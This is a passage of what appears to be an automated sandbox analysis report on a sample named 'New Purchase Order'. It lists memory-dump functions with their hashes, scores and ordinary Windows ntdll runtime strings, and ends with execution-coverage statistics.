                • Instruction Fuzzy Hash: 9B90022160541406D54171585419706005597D1301F55D011E5038554DCA598B9967A2
                Function 01812CF0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 98b1041bca71ab43b8cdd8d8f6bd7efbbc02f099b831d581280d9a65ccfaa7aa
                • Instruction ID: 411171b1bfe5d4da1b1c0a071c30b24d380450d55b0a0e4af0c99e13578fba22
                • Opcode Fuzzy Hash: 98b1041bca71ab43b8cdd8d8f6bd7efbbc02f099b831d581280d9a65ccfaa7aa
                • Instruction Fuzzy Hash: 7090023120141407D50171585509707004597D1301F55D411E5438558DDA568A956222
                Function 01812C60 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 09206e9d3c50193aa89872d9fd845d8c01d74c6890fe754deee46d71a02d0983
                • Instruction ID: cc5c01b4f6cf90035e6238997820de810f116caafbe2e921f317ff46cca7c76f
                • Opcode Fuzzy Hash: 09206e9d3c50193aa89872d9fd845d8c01d74c6890fe754deee46d71a02d0983
                • Instruction Fuzzy Hash: BF90023120141846D50171584405B46004597E1301F55C016E5138654DCA15CA957622
                Function 01812F90 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b8a4d680c67ee9e4357e743eda9a3d191f39cbbf1faab40fdbc875ffa58da3d7
                • Instruction ID: 8beed3f05b6e7147c2b13ccb9e1baa906f22dc98a5b2b5a0f7ea9d5c96758365
                • Opcode Fuzzy Hash: b8a4d680c67ee9e4357e743eda9a3d191f39cbbf1faab40fdbc875ffa58da3d7
                • Instruction Fuzzy Hash: 3E90023120181406D5017158481570B004597D1302F55C011E6178555DCA258A956672
                Function 01812FA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 647d8bd37a7c817aa7247e9c36bc2450dd6eb5ad0ab502c688614d51dadc4b98
                • Instruction ID: fdcdca2c39e05ca06bbf546ad167a1c05602ca3ecdbccd4c21556df75494c4b8
                • Opcode Fuzzy Hash: 647d8bd37a7c817aa7247e9c36bc2450dd6eb5ad0ab502c688614d51dadc4b98
                • Instruction Fuzzy Hash: 1B90023120181406D50171584809747004597D1302F55C011EA178555ECA65CAD56632
                Function 01812FB0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 176feaf1d25c62d662d97d0db6070e55bc279f2cb09aefbae1c28300770f112c
                • Instruction ID: 759e33711e3df367780cf9474ebbcf2b491d37e92b9842ac0eedf854ce6f1669
                • Opcode Fuzzy Hash: 176feaf1d25c62d662d97d0db6070e55bc279f2cb09aefbae1c28300770f112c
                • Instruction Fuzzy Hash: 24900221601410464541716888459064045BBE2311755C121E59AC550DC9598AA95766
                Function 01812FE0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1a1edaa1aeffab37fc1789eb442f384a1d1d208c07960e651d618cbabfdd27bb
                • Instruction ID: 8614b132e70a6243bdc4cf5812171f364d3e988628d5cb6e27cbefc664eedbda
                • Opcode Fuzzy Hash: 1a1edaa1aeffab37fc1789eb442f384a1d1d208c07960e651d618cbabfdd27bb
                • Instruction Fuzzy Hash: A7900221211C1046D60175684C15B07004597D1303F55C115E5168554CCD158AA55622
                Function 01812F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d2d17d35e1868b077667bcbed9f9308f7975c6b7e4de0f7e0d6eec18d54dff5c
                • Instruction ID: 5700324175ab69474d0c10da38491c1bcccd53e156d4b02f542af856cf161805
                • Opcode Fuzzy Hash: d2d17d35e1868b077667bcbed9f9308f7975c6b7e4de0f7e0d6eec18d54dff5c
                • Instruction Fuzzy Hash: 6990026134141446D50171584415B060045D7E2301F55C015E6078554DCA19CE966227
                Function 01812F60 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f453cf8ade48072803efe4366b2491584fa533fbb10d117123d620878b40b0a4
                • Instruction ID: 8ed9bf3dc91fd6663943fc9ebb2317b114dd5a3740c309ad2c0225faba20c56d
                • Opcode Fuzzy Hash: f453cf8ade48072803efe4366b2491584fa533fbb10d117123d620878b40b0a4
                • Instruction Fuzzy Hash: 2090026121141046D50571584405706008597E2301F55C012E7168554CC9298EA55226
                Function 01812E80 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 342b3d850a5e30f70603d95a8a84ffc1171f3688748fb2a752784120649bf29f
                • Instruction ID: 65222a017326953917af94158765b43a8fda1cf4ac512d8310845f4d0d3867bd
                • Opcode Fuzzy Hash: 342b3d850a5e30f70603d95a8a84ffc1171f3688748fb2a752784120649bf29f
                • Instruction Fuzzy Hash: 8A90022160141506D50271584405616004A97D1341F95C022E6038555ECE258BD6A232
                Function 01812EA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc7f6e2a4e9320cb844035cd72347900077fb40d573ec0caf8406ebd44440bbc
                • Instruction ID: c51dc206bc289ea4f209eaffcade76dae3bcfbaa3498d411fd26e6855a7510de
                • Opcode Fuzzy Hash: fc7f6e2a4e9320cb844035cd72347900077fb40d573ec0caf8406ebd44440bbc
                • Instruction Fuzzy Hash: 7290027120141406D54171584405746004597D1301F55C011EA078554ECA598FD96766
                Function 01812EE0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 520e3601b6916d723b4b88de85a800269f1b5b1355be2ce3e526910babe72da2
                • Instruction ID: 64a515b884a7f9f0855c79b5b8dee351980096653504fdccf60eac43770b6814
                • Opcode Fuzzy Hash: 520e3601b6916d723b4b88de85a800269f1b5b1355be2ce3e526910babe72da2
                • Instruction Fuzzy Hash: 9D90026120181407D54175584805607004597D1302F55C011E7078555ECE298E956236
                Function 01812E30 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 569ee20a331bd790c95f7da12d605b8743e92b6a2c65cd409af253fdf0f16d76
                • Instruction ID: a6715fb30759c359b7a7db3f9414e2e272970355bf68ee7a7152dd542d324e89
                • Opcode Fuzzy Hash: 569ee20a331bd790c95f7da12d605b8743e92b6a2c65cd409af253fdf0f16d76
                • Instruction Fuzzy Hash: 9390022130141406D503715844156060049D7D2345F95C012E6438555DCA258B97A233
                Function 01813090 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 239705dd7af3ab68df78c6d2e5f28048c8b0fba86895afb148b51a2e76d55b05
                • Instruction ID: 0214d1af6c8680543e1a57658f4cc2728965256b61e7002fedb4628d04e8ff33
                • Opcode Fuzzy Hash: 239705dd7af3ab68df78c6d2e5f28048c8b0fba86895afb148b51a2e76d55b05
                • Instruction Fuzzy Hash: 0E90022124141806D541715884157070046D7D1701F55C011E5038554DCA168BA967B2
                Function 01813010 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: af4fe0a41535251c33f00e8d30e960af0e854e8ddaa160ec43d369e0c35f5608
                • Instruction ID: ccb7e47dc973f41b644dd80a9666900fade5e321a3b27c7c78ed59092942c323
                • Opcode Fuzzy Hash: af4fe0a41535251c33f00e8d30e960af0e854e8ddaa160ec43d369e0c35f5608
                • Instruction Fuzzy Hash: B590022120185446D54172584805B0F414597E2302F95C019E916A554CCD158A995722
                Function 018139B0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc182a37bb4a1e11e56f431408a46aa9f08cf1d24b0bff99b02e7f5ea6d2ba9b
                • Instruction ID: 0b2319c721bc8453001c9681bfea233ea5ac0b1a5370630f267a0a2d2343300e
                • Opcode Fuzzy Hash: fc182a37bb4a1e11e56f431408a46aa9f08cf1d24b0bff99b02e7f5ea6d2ba9b
                • Instruction Fuzzy Hash: D190022124546106D551715C44056164045B7E1301F55C021E5828594DC9558A996322
                Function 01813D10 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 364995cc996b41159ad0a24c2c641c627d62488233a7b6b1046cb17f4c14d9fe
                • Instruction ID: 007036170b5f4500f4a86b8abe93d303b387bb9975a1570fc028feaa823722a0
                • Opcode Fuzzy Hash: 364995cc996b41159ad0a24c2c641c627d62488233a7b6b1046cb17f4c14d9fe
                • Instruction Fuzzy Hash: 6190023120241146994172585805A4E414597E2302B95D415E5029554CCD148AA55322
                Function 01813D70 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: abcb62053508fb1891e17316fe1755a6cd4881f1aabddc343597d772deab89ac
                • Instruction ID: 04ff5ff1d6101d814bfd865b75ab7482b988c68599376503f2cce817d712c1b0
                • Opcode Fuzzy Hash: abcb62053508fb1891e17316fe1755a6cd4881f1aabddc343597d772deab89ac
                • Instruction Fuzzy Hash: 9590023520141406D91171585805646008697D1301F55D411E5438558DCA548AE5A222
                Function 01812C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction ID: 5c50d62c8420c679e74bc3c3473ab3f4413ab18957b0b7cf1e19b8694fb772fd
                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction Fuzzy Hash:
                Function 01812890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: ee8b19aced4bd19a4ec72388f384d0a1d008057c1da42dba180687bf853e1568
                • Instruction ID: 96a30afb2279e16baf28d643eaa6eb0053075ceb8dddcc606288796155f83914
                • Opcode Fuzzy Hash: ee8b19aced4bd19a4ec72388f384d0a1d008057c1da42dba180687bf853e1568
                • Instruction Fuzzy Hash: 4A51F6B2A0011ABFDB11DBAC899097EFBBDBB483407608229F4A5D7645D734DF4087E0
                Function 01882410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: b70f5493bb1c3b3ca3542e0c5ba9a7ca817533433cd12a247ef44c8ed8d3d72e
                • Instruction ID: 4d51e301cf5f431a4085dedf14ff1180aa6c557132e50d539c6309c388d1a702
                • Opcode Fuzzy Hash: b70f5493bb1c3b3ca3542e0c5ba9a7ca817533433cd12a247ef44c8ed8d3d72e
                • Instruction Fuzzy Hash: C651F1B5A40646AACB30EE9CC99087FFBFAAF44300B44846DF496D3642E674EB40C770
                Function 01807630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                Download Yara Rule
                Strings
                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01844742
                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01844655
                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01844725
                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018446FC
                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01844787
                • ExecuteOptions, xrefs: 018446A0
                • Execute=1, xrefs: 01844713
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                • API String ID: 0-484625025
                • Opcode ID: ebb7944b7fcebc284e94316082138612a44034b48dccdcf29f6fd619895b59e3
                • Instruction ID: 74289f425b6418d8be41dac9285a9a8398f811a55d6a5c9898360217955806e2
                • Opcode Fuzzy Hash: ebb7944b7fcebc284e94316082138612a44034b48dccdcf29f6fd619895b59e3
                • Instruction Fuzzy Hash: 1D51197160021DAAEF62EAA8DC95BB977A8EF14344F1400A9E606E71C1EB70AB458F51
                Function 018A6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction ID: 42a62f0f8c53f7d8bda98900ab731fc1f43c68f578abc89cb326012205b67b4d
                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                • Instruction Fuzzy Hash: C2021871508342AFE305CF18C490A6BBBE5FFC4714F648A2DFA9587258EB71EA05CB52
                Function 0181B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction ID: 85cecca8b308c48b45c1cf395c914ab586026284699d9b2b98a79a262f643a8d
                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction Fuzzy Hash: D081E372E052498FEF258F6CC8517FEBBB9AF54760F184919E851E7299C7308A40CB61
                Function 018820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$[$]:%u
                • API String ID: 48624451-2819853543
                • Opcode ID: 7843487436741cc4d9c6c8fab32fccf7433ad8d76a73c0524ec3d1da09fb07ef
                • Instruction ID: 33c38526ee9265dfe10424da57a061e01d01804813582f817285b848e3c50869
                • Opcode Fuzzy Hash: 7843487436741cc4d9c6c8fab32fccf7433ad8d76a73c0524ec3d1da09fb07ef
                • Instruction Fuzzy Hash: 182151BAA00519ABDB11EF7DC840AAEBBE9EF54744F54011AE905E3204E730EB11CBA1
                Function 017FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                Download Yara Rule
                Strings
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018402BD
                • RTL: Re-Waiting, xrefs: 0184031E
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018402E7
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                • API String ID: 0-2474120054
                • Opcode ID: 24566e7d1c5dd4416ae393b8e9300915fd89bddd8e3822d23dbd8f909b9fee8f
                • Instruction ID: d0138a0c60c462586f2754cbd83f003971552e3aef632858dbfbc3af8f22222b
                • Opcode Fuzzy Hash: 24566e7d1c5dd4416ae393b8e9300915fd89bddd8e3822d23dbd8f909b9fee8f
                • Instruction Fuzzy Hash: 97E1AA326087459FD725CF28C884B6BBBE0AB88714F140A5DF6A5CB3E1DB74DA44CB52
                Function 0180BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                Download Yara Rule
                Strings
                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01847B7F
                • RTL: Re-Waiting, xrefs: 01847BAC
                • RTL: Resource at %p, xrefs: 01847B8E
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 0-871070163
                • Opcode ID: eaa6095cce8d35c821583fec88b052c6fde1faa14981f67a4d76a157eb4d6afa
                • Instruction ID: f8eb3268073753a88c83e6c109dae21b6e48363a430e10f1477d2f4160b27a55
                • Opcode Fuzzy Hash: eaa6095cce8d35c821583fec88b052c6fde1faa14981f67a4d76a157eb4d6afa
                • Instruction Fuzzy Hash: B941263530170A8FD726DE29CC40B6AB7E5EF88710F100A1DFA56D7280DB31EA058B92
                Function 0180B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                Download Yara Rule
                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0184728C
                Strings
                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01847294
                • RTL: Re-Waiting, xrefs: 018472C1
                • RTL: Resource at %p, xrefs: 018472A3
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 885266447-605551621
                • Opcode ID: da1e8683500f4b8e552b25174d4699b8d0e9a6409287b4555120c5ca69d7bc80
                • Instruction ID: 5ad9ec352261f7957b9e8bfe31103b7ddfaf6803214728911d6b02200fa8f19a
                • Opcode Fuzzy Hash: da1e8683500f4b8e552b25174d4699b8d0e9a6409287b4555120c5ca69d7bc80
                • Instruction Fuzzy Hash: 9041227570061AABC721CE29CC81B66B7A5FB94714F100619F956EB280DB31EA4287D2
                Function 01882300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: %%%u$]:%u
                • API String ID: 48624451-3050659472
                • Opcode ID: 56263039b4f1cef36665780a51a29875762760900755e0233688be340a777660
                • Instruction ID: dd5b80cc0211d80568b7e559f871a180add6955aa70751cd6103ec3b9cca9cba
                • Opcode Fuzzy Hash: 56263039b4f1cef36665780a51a29875762760900755e0233688be340a777660
                • Instruction Fuzzy Hash: 4C317376A002199EDB20DE2DCC50BAEB7F9AF44710F84455AE949E3200EB30AB44CBA1
                Function 01817D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-
                • API String ID: 1302938615-2137968064
                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction ID: e3732f5f58d65c20e8a1baa20bd1bc0f58955fbe311d0d13f036fcd12286329a
                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                • Instruction Fuzzy Hash: 2F91A173E0020A9AEB24DF6DC881ABFBBA9AF45720F64451EE955E72C8D7309B408751
                Function 017D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: $$@
                • API String ID: 0-1194432280
                • Opcode ID: c54bc7c70051c2b7fd6d4a6ca20a259aac4891217d319860771d2b4169ca7bf0
                • Instruction ID: 8b0973c9e3fb7a8c421c9a124d811706ba930401231ee9ef54327a80ae95c6a6
                • Opcode Fuzzy Hash: c54bc7c70051c2b7fd6d4a6ca20a259aac4891217d319860771d2b4169ca7bf0
                • Instruction Fuzzy Hash: 90810C71D002699BDB31CB54CC45BEAB7B9AF48714F0441EAEA19B7280E7705F84DFA0
                Function 0185CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                Download Yara Rule
                APIs
                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0185CFBD
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID: CallFilterFunc@8
                • String ID: @$@4Cw@4Cw
                • API String ID: 4062629308-3101775584
                • Opcode ID: 5e77ff5f238a0284bf5a5e6e1f15e8f1cfe9985b154a2b73ca6fd60ce478fe2a
                • Instruction ID: b67d58bfea3b3cdf68ce8a4a5cacc7f1daab169fdd5d8d19525f79af9931085f
                • Opcode Fuzzy Hash: 5e77ff5f238a0284bf5a5e6e1f15e8f1cfe9985b154a2b73ca6fd60ce478fe2a
                • Instruction Fuzzy Hash: AB41CD75900219DFCB219FA9C884AAEFBF8FF58B10F10412AEE11DB254E774CA01CB61

                Execution Graph

                Execution Coverage:9.8%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:76
                Total number of Limit Nodes:12
